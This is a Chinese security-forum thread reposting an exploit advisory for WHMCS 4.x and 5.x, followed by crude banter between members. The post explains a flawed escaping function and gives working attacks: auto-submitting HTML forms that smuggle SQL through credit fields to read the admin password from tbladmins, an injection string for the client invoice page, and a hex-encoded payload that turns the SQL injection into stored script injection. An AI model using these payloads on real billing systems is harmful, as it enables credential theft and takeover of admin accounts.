查看: 15482|回复: 4

WHMCS 4.x & 5.x – Multiple Web Vulnerabilities

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2013-12-31 00:53:55 | 显示全部楼层 |阅读模式
    # Exploit Title: WHMCS v4.x & v5.x - Multiple Web Vulnerabilities
    # Date: 2013-12-10
    # Exploit Author: ahwak2000
    # Vendor Homepage: http://whmcs.com/
    # Version: 4.x , 5.x
    # Tested on: win 7

    +------------------+
    | Vulnerability |
    +------------------+
    [AppleScript] 纯文本查看 复制代码
    File : includes\dbfunctions.php 
      
    function db_escape_string($string) {
      
    $string = mysql_real_escape_string($string);
      
    return $string;
      
    }

    +------------------+
    | Description |
    +------------------+

    the script use this function to secure the input
    the function disable only the ' and "
    but we can bypass it if the query don't use '

    +------------+
    | Example |
    +------------+

    file : admin/invoices.php
    [AppleScript] 纯文本查看 复制代码
    [...]
    $query = "UPDATE tblinvoices SET credit=credit-" . db_escape_string($removecredit) . " WHERE id='" . db_escape_string($id) . "'";
                    full_query($query);
    [...]

    +------------+
    |Exploitation|
    +------------+

    [AppleScript] 纯文本查看 复制代码
    <html>
        <body onload="submitForm()">
        <form name="myForm" id="myForm"
        action="http://localhost/whmcs5214/admin/invoices.php" method="post">
        <input type="hidden" name="token" value="ahwak2000">
        <input type="hidden" name="id" value="1">
        <input type="hidden" name="removecredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
        <input type="hidden" name="action" value="edit">
        </form>
        <script type='text/javascript'>document.myForm.submit();</script>
    </html>

    或者
    [AppleScript] 纯文本查看 复制代码
    <html>
        <body onload="submitForm()">
        <form name="myForm" id="myForm"
        action="http://localhost/whmcs5214/admin/invoices.php" method="post">
        <input type="hidden" name="token" value="ahwak2000">
        <input type="hidden" name="id" value="1">
        <input type="hidden" name="addcredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
        <input type="hidden" name="action" value="edit">
        </form>
        <script type='text/javascript'>document.myForm.submit();</script>
    </html>

    +------------+
    | Example 2|
    +------------+

    file : includes/invoicefunctions.php
    [AppleScript] 纯文本查看 复制代码
    function applyCredit($invoiceid, $userid, $amount="", $noemail = "") {
        $query = "UPDATE tblinvoices SET credit=credit+" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($invoiceid) . "'";
        full_query($query);
        $query = "UPDATE tblclients SET credit=credit-" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($userid) . "'";
        full_query($query);
    [...]
        }
      
    }
      
    File: /viewinvoice.php
    if ($invoice->getData("status") == "Unpaid" && 0 < $creditbal) {
          
        $creditamount = $whmcs->get_req_var("creditamount");
        if ($whmcs->get_req_var("applycredit") && 0 < $creditamount) {
            check_token();
      
            if ($creditbal < $creditamount) {
                echo $_LANG['invoiceaddcreditovercredit'];
                exit();
            }
            else {
                if ($balance < $creditamount) {
                    echo $_LANG['invoiceaddcreditoverbalance'];
                    exit();
                }
                else {
                  
                    applyCredit($invoiceid, $invoice->getData("userid"), $creditamount);
                }
            }
      
            redir("id=" . $invoiceid);
        }
      
        $smartyvalues['manualapplycredit'] = true;
        $smartyvalues['totalcredit'] = formatCurrency($creditbal) . generate_token("form");
      
        if (!$creditamount) {
            $creditamount = ($balance <= $creditbal ? $balance : $creditbal);
        }
      
        $smartyvalues['creditamount'] = $creditamount;
    }

    +------------+
    |Exploitation|
    +------------+
    Go to http://127.0.0.1/whmcs5214/viewinvoice.php?id=1 <~ edit

    if client have creditt and when he want to pay with credit

    in the "Enter the amount to apply:" put 0.01,Address2=(SELECT password from tbladmins limit 0,1)

    the admin password will be in the client address

    +-----------------+
    sql => xss

    SQL can convert to XSS
    Must Encode XSS to Hex
    Example :

    (SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)

    ?
    [AppleScript] 纯文本查看 复制代码
    //<script>alert('ahwak2000');</script>

    SQL can be modified to work when all members and supervisors
    (SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)# <~

    +-------------------+

    ./END
    游客,如果您要查看本帖隐藏内容请回复
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2017-8-15 00:19
  • 签到天数: 126 天

    [LV.7]常住居民III

    发表于 2013-12-31 01:26:28 | 显示全部楼层
    本帖最后由 野驴~ 于 2013-12-31 01:27 编辑

    楼主,你这么牛逼,你妹子知道么。就是不知道现在最高版本到X了
    我必须再回来补一句,楼主你回复可见的内容真实太牛逼了,楼下值得拥有,绝对的干货。快来回复吧!

    点评

    我家妹子在床上就知道我已经有多牛逼了。嘿嘿  详情 回复 发表于 2013-12-31 11:47
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2013-12-31 02:06:20 | 显示全部楼层
    这都可以 ~ 妞B吧 你家人都知道吗~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

     楼主| 发表于 2013-12-31 11:47:27 | 显示全部楼层
    野驴~ 发表于 2013-12-31 01:26
    楼主,你这么牛逼,你妹子知道么。就是不知道现在最高版本到X了
    我必须再回来补一句,楼主你回复可见的内容 ...

    我家妹子在床上就知道我已经有多牛逼了。嘿嘿

    点评

    你为何这么猥琐  详情 回复 发表于 2013-12-31 16:59
    90_
    你还能再贱一点么  发表于 2013-12-31 11:59
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-12-31 16:59:22 | 显示全部楼层
    C4r1st 发表于 2013-12-31 11:47
    我家妹子在床上就知道我已经有多牛逼了。嘿嘿

    你为何这么猥琐
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-24 10:17 , Processed in 0.022638 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部